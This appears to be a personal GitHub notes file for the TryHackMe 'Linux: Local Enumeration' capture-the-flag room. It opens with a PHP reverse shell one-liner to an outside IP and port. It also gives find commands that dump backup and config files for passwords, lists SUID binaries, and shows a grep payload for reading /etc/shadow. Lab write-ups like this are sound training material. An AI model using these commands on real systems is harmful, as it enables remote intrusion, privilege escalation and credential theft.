-
Notifications
You must be signed in to change notification settings - Fork 0
/
Linux: Local Enumeration
56 lines (42 loc) · 1.43 KB
/
Linux: Local Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
php -r '$sock=fsockopen("10.6.88.227",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
python3 -c 'import pty; pty.spawn("/bin/bash")'
#Task 6 Unit 4 - Find command and interesting files
What's the password you found?
find / -name *.bak -type f -print | xargs /bin/cat
Did you find a flag?
find / -name *.conf -type f -print 2>/dev/null
cat /etc/sysconf/flag.conf
#Task 7 Unit 4 - SUID
find / -perm -u=s -type f 2>/dev/null
-u=s searches files that are owned by the root user.
-type f search for files, not directories
- Which SUID binary has a way to escalate your privileges on the box?
find / -perm -4000 2>/dev/null
/bin/su
/bin/grep
/bin/ntfs-3g
/bin/mount
/bin/ping
/bin/umount
/bin/fusermount
/usr/bin/chsh
/usr/bin/arping
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
.....
https://gtfobins.github.io/gtfobins/grep/#suid
ANSWER: grep
What's the payload you can use to read /etc/shadow with this SUID?
./grep '' /etc/shadow
https://tryhackme.com/room/lle
http://related.cupprs.com/linux-local-enumeration/
https://cybertroll.medium.com/local-enumeration-writeup-tryhackme-27ca1a723655
https://halloper123.medium.com/tryhackme-linux-local-enumartion-writeup-4a8640e5a4fa
https://www.thedutchhacker.com/linux-local-enumeration-on-tryhackme/
https://www.kumaratuljaiswal.in/2021/01/tryhackme-linux-local-enumeration.html
https://gtfobins.github.io/gtfobins/perl/